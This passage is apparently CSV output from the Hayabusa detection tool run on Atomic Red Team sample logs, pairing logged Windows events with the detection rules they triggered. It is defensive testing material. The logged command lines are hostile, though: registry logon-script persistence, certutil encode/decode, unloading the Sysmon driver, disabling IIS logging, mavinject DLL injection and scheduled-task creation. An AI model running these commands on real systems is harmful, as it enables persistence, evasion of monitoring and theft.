747F3D96-D982-5D31-0000-0010DC633900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,../hayabusa-rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe | LID: 0x50951 | PID: 3608 | PGUID: 747F3D96-D983-5D31-0000-00102E663900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,../hayabusa-rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Persis,Common Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_common.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Persis | LatMov,Logon Scripts (UserInitMprLogonScript) Registry,,../hayabusa-rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4944 | PGUID: 747F3D96-D989-5D31-0000-0010FC7B3900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2000 | PGUID: 747F3D96-D998-5D31-0000-001008B43900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2424 | PGUID: 747F3D96-D998-5D31-0000-00101BB73900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:54:57.044 +09:00,MSEDGEWIN10,19,info,,WMI Event Filter Activity,"Created | Namespace: ""root\\CimV2"" | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"" | User: MSEDGEWIN10\IEUser",../hayabusa-rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:54:58.819 +09:00,MSEDGEWIN10,20,info,,WMI Event Consumer Activity,"Created | Type: Command Line | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Dst: ""C:\\Windows\\System32\\notepad.exe"" | User: MSEDGEWIN10\IEUser",../hayabusa-rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:02.378 +09:00,MSEDGEWIN10,21,info,,WMI Event Consumer To Filter Activity,"Created | Consumer: ""\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\""AtomicRedTeam-WMIPersistence-Example\"""" | Filter: ""\\\\.\\ROOT\\subscription:__EventFilter.Name=\""AtomicRedTeam-WMIPersistence-Example\""""",../hayabusa-rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:02.806 +09:00,MSEDGEWIN10,21,info,,WMI Event Consumer To Filter Activity,"Deleted | Consumer: ""\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\""AtomicRedTeam-WMIPersistence-Example\"""" | Filter: ""\\\\.\\ROOT\\subscription:__EventFilter.Name=\""AtomicRedTeam-WMIPersistence-Example\""""",../hayabusa-rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:02.895 +09:00,MSEDGEWIN10,20,info,,WMI Event Consumer Activity,"Deleted | Type: Command Line | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Dst: ""C:\\Windows\\System32\\notepad.exe"" | User: MSEDGEWIN10\IEUser",../hayabusa-rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:02.977 +09:00,MSEDGEWIN10,19,info,,WMI Event Filter Activity,"Deleted | Namespace: ""root\\CimV2"" | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"" | User: MSEDGEWIN10\IEUser",../hayabusa-rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4832 | PGUID: 747F3D96-DA3F-5D31-0000-00104C173C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: certutil.exe -encode c:\file.exe file.txt | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" | LID: 0x50951 | PID: 1260 | PGUID: 747F3D96-DA3F-5D31-0000-00109E193C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4020 | PGUID: 747F3D96-DA3F-5D31-0000-0010562E3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: certutil.exe -decode file.txt c:\file.exe | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-DA3F-5D31-0000-001022323C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-DA3F-5D31-0000-0010813E3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6572 | PGUID: 747F3D96-DA40-5D31-0000-00106A543C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp"" | LID: 0x50951 | PID: 5168 | PGUID: 747F3D96-DA40-5D31-0000-0010B1553C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4336 | PGUID: 747F3D96-DA40-5D31-0000-0010CF5A3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt"" | LID: 0x50951 | PID: 3932 | PGUID: 747F3D96-DA40-5D31-0000-0010565D3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Evas,Process Created_Non-Exe Filetype,"Cmd: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | LID: 0x50951 | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00 | Hash: SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_NonExeProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | LID: 0x50951 | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.600 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 264 | PGUID: 747F3D96-DA40-5D31-0000-0010E16B3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3976 | PGUID: 747F3D96-DA4A-5D31-0000-0010C21F3D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1012 | PGUID: 747F3D96-DA4A-5D31-0000-0010EE223D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4056 | PGUID: 747F3D96-DA4A-5D31-0000-00106C293D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2584 | PGUID: 747F3D96-DA4A-5D31-0000-00107A2C3D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll | Process: C:\Windows\System32\mavinject.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2604 | PGUID: 747F3D96-DA4B-5D31-0000-0010CB413D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,,MavInject Process Injection,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:16.496 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2596 | PGUID: 747F3D96-DA4C-5D31-0000-0010655D3D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-DA4C-5D31-0000-001077603D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3536 | PGUID: 747F3D96-DA68-5D31-0000-001025713E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.073 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-DA6A-5D31-0000-0010B2953E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management AT | Cmd: at 13:20 /interactive cmd | Process: C:\Windows\System32\at.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" | LID: 0x50951 | PID: 3864 | PGUID: 747F3D96-DA6A-5D31-0000-001004983E00 | Hash: SHA1=EC6F04AA61D8F0FA0945EBFC58F6CC7CEBB1377A,MD5=F4416891D11BBA6975E5067FA10507C8,SHA256=73A9A6A4C9CF19FCD117EB3C430E1C9ACADED31B42875BA4F02FA61DA1B8A6DC,IMPHASH=FA9A9B0D471E4B5F3683C346C3D880BD",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,PrivEsc,Interactive AT Job,,../hayabusa-rules/sigma/process_creation/proc_creation_win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3224 | PGUID: 747F3D96-DA6A-5D31-0000-0010C09D3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4276 | PGUID: 747F3D96-DA6A-5D31-0000-001072A63E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" | LID: 0x50951 | PID: 1408 | PGUID: 747F3D96-DA6A-5D31-0000-0010C4A83E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.608 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Tasks\spawn | Process: C:\Windows\system32\svchost.exe | PID: 1108 | PGUID: 747F3D96-D4A5-5D31-0000-001037D40000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4552 | PGUID: 747F3D96-DA6A-5D31-0000-001025AD3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" | Process: 